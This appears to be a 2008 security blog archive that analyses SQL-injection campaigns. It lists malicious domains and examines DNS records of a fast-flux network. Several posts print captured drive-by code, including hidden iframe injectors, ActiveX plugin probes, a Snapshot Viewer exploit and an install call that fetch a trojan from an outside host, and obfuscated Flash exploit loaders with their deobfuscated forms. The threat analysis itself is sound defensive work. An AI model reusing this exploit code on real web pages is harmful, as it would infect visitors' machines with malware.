jj.js essentially loads an iframe pointing to ‘http://www.worldofwarcrokft.com/1/index.htm’.
index.htm is 8-bit ASCII encoded. The hexdump content is as follows:
Archive for July, 2008
www.worldofwarcrokft.com/jj.js
Posted in sql injection on July 31, 2008 by s3cu
*/js.js and */jj.js
Posted in sql injection on July 31, 2008 by s3cu
Has the old wave of attacks died down?
Have attacks using these */js.js and */jj.js malicious scripts taken over?
- www.iroe.ru/js.js
- www.bnsr.ru/js.js
- www.njep.ru/js.js
- www.ch35.ru/js.js
- www.jve4.ru/js.js
- www.worldofwarcrokft.com/jj.js
analysis of www.h23f.ru/ngg.js
Posted in sql injection on July 26, 2008 by s3cu
This injected domain loads an iframe whose src is http://iroe.ru/cgi-bin/index.cgi?ad
www.o1o2qq.cn/ri.js
Posted in sql injection on July 22, 2008 by s3cu
Another injected script src.
The script redirects to a URL chosen according to whether the browser language is set to Chinese.
Content as follows:
www.liwejr.cn/c4.htm?b029
Posted in sql injection on July 22, 2008 by s3cu
This injected iframe src calls go.html.
go.html in turn calls exploits hosted on user1.date-21.net.
The contents of go.html are as follows:
*/ngg.js (update 2)
Posted in sql injection on July 18, 2008 by s3cu
More *.ru domains:
- www.iogp.ru/ngg.js
- www.nudk.ru/ngg.js
- www.sdkj.ru/ngg.js
Browsing to the main page of, say, www.nudk.ru, the website of Cash-Transfers Inc. appears.
Compare the output of “dig www.iogp.ru” with that of “dig www.cashtransfers.tk”:
;; ANSWER SECTION:
www.iogp.ru. 200 IN A 76.73.139.26
www.iogp.ru. 200 IN A 81.109.236.138
www.iogp.ru. 200 IN A 98.14.3.126
www.iogp.ru. 200 IN A 71.62.120.230
www.iogp.ru. 200 IN A 76.30.118.52
www.iogp.ru. 200 IN A 24.20.116.38
www.iogp.ru. 200 IN A 74.128.165.226
www.iogp.ru. 200 IN A 76.118.74.21
www.iogp.ru. 200 IN A 24.86.16.225
www.iogp.ru. 200 IN A 65.96.41.17
www.iogp.ru. 200 IN A 70.79.211.89
www.iogp.ru. 200 IN A 76.199.17.243
www.iogp.ru. 200 IN A 123.195.179.249
www.iogp.ru. 200 IN A 194.44.214.81
www.iogp.ru. 200 IN A 71.228.191.159
;; ANSWER SECTION:
www.cashtransfers.tk. 600 IN A 194.44.214.81
www.cashtransfers.tk. 600 IN A 76.30.118.52
www.cashtransfers.tk. 600 IN A 71.228.191.159
www.cashtransfers.tk. 600 IN A 65.96.41.17
www.cashtransfers.tk. 600 IN A 81.109.236.138
www.cashtransfers.tk. 600 IN A 76.199.17.243
www.cashtransfers.tk. 600 IN A 89.139.15.213
www.cashtransfers.tk. 600 IN A 74.128.165.226
www.cashtransfers.tk. 600 IN A 76.73.139.26
www.cashtransfers.tk. 600 IN A 76.118.74.21
www.cashtransfers.tk. 600 IN A 71.62.120.230
www.cashtransfers.tk. 600 IN A 70.79.211.89
www.cashtransfers.tk. 600 IN A 24.20.116.38
www.cashtransfers.tk. 600 IN A 79.87.139.200
www.cashtransfers.tk. 600 IN A 98.14.3.126
Both names resolve to largely the same pool of addresses. What is Cash Transfers Inc.? Maybe this spam mail can give some clue…
www.eoai114.cn and user1.jzm010.cn
Posted in Uncategorized on July 17, 2008 by s3cu
Malicious content here…
Content of index.html
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://user1.jzm010.cn/ilink.html width=100 height=0
></iframe>");
}
else{document.write("<Iframe src=http://user1.jzm010.cn/flink.html width=100 hei
ght=0></iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.dxp008.cn\/b2.htm width=50 height=0><
\/iframe>")
Content of aa2.htm?20
<Iframe src="http://user1.jzm010.cn/14.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/fx.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/ac.htm" width=100 height=0></iframe>
<script>
var kaspersky="woyaofa"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTStri
ng"]()
try{if(new window["ActiveXObject"]("GLIEDown.IEDown.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/newlz.htm"></iframe>
');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/real11.htm"></iframe
>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/real10.htm"></iframe
>');}catch(e){}
try{if(new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1"))window["document"]["wr
ite"]('<iframe style=display:none src="http://user1.jzm010.cn/lz.htm"></iframe>'
);}catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/
1812235.js"></script>
Let’s follow one of the links, user1.jzm010.cn/ac.htm:
<html><object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="obj"></object>
<script language="javascript">
var buf1 = "http://dddd.nihao69.cn/down/ko.exe";
var buf2 = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/qq.exe";
obj.SnapshotPath = buf1;obj.CompressedPath = buf2;obj.PrintSnapshot();
</script></html>
<Iframe src="http://user1.jzm010.cn/ce.htm" width=100 height=0></iframe>
What’s this? It’s exploiting the MS Snapshot Viewer ActiveX control to download a trojan. The target path in buf2 is the All Users Startup folder of a Chinese-language Windows install, so the dropped file runs at the next logon.
Let’s follow another link, user1.jzm010.cn/ce.htm:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2900.3354" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1="http://dddd.nihao69.cn/down/ko.exe";
install["DownloadAndInstall"](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>
What is this CLSID? It could be another new exploit…
*/ngg.js (update 1)
Posted in sql injection on July 17, 2008 by s3cu
.ru domains have started to be used as the injected domains.
Examples:
- www.grtsel.ru/ngg.js
- www.korfd.ru/ngg.js
- www.btoperc.ru/ngg.js
- www.brcporb.ru/ngg.js
Another interesting TLD in use is .eu.
Example:
- www.cdport.eu/ngg.js
www.maigol.cn/index.htm
Posted in sql injection on July 6, 2008 by s3cu
This is a partial analysis of the malicious site.
Content of index.htm
<script>
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
document.write("<iframe width=20 height=0 src=re10.htm></iframe>");
document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
try{var f;
var gw=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var m;
var ww=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6C\x2E\x49\x45\x52\x50\x43\x74\x6C\x2E\x31");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=re11.htm></iframe>");}}
</script>
At first glance, we can deduce that it tries to exploit plugins such as RealPlayer, Flash (SWF) and others.
flash.htm calls ilink.html and flink.html
Content of flink.html
<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))
+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);
k=[function(e){return d[e]}];
e=function(){return'\\w+'};c=1};
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p}('6 4=A.z.y();3(4[\'x\']==9){h.g(\'j\').i=""; 3(4[\'5\']==w)
{6 2=f e("./v.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==u){6 2=f e("./t.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==s){6 2=f e("./r.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==q){6 2=f e("./p.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==o){6 2=f e("./n.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==m){6 2=f e("./l.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']>=k){3(h.g){h.g(\'j\').i=""}}}',37,37,'||so|if|version|rev|var|else|flashcontent||
write|000000|mymovie|swf|SWFObject|new|getElementById|document|
innerHTML|flashversion|124|f16|16|f28|28|f45|45|f47|47|f64|64|f115|115|
major|getPlayerVersion|SWFObjectUtil|deconcept'.split('|'),0,{}));
document.write("")</script>
It is interesting to note that a tool like swfobject (v1.5.1) is used. The obfuscated function essentially uses the swfobject code to check the Flash Player version and load the exploit matching that version; the deobfuscated code is as follows:
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else
if(version['rev']>=124){if(document.getElementById)
{document.getElementById('flashversion').innerHTML=""}}}
*/ri.js
Posted in sql injection on July 5, 2008 by s3cu
Those SQL-injected domains ending with /ri.js.
Examples:
- www.qq117cc.cn/ri.js (previously reported as using k.js)
- www.loveqianlai.cn/ri.js
- www.maigol.cn/ri.js
- www.qqcc123.cn/ri.js
- www.hiwowpp.cn/ri.js
Some of the above JS files point to www.bdsae.org.cn/bdsae/aa.htm?11,
which contains some interesting new scripts.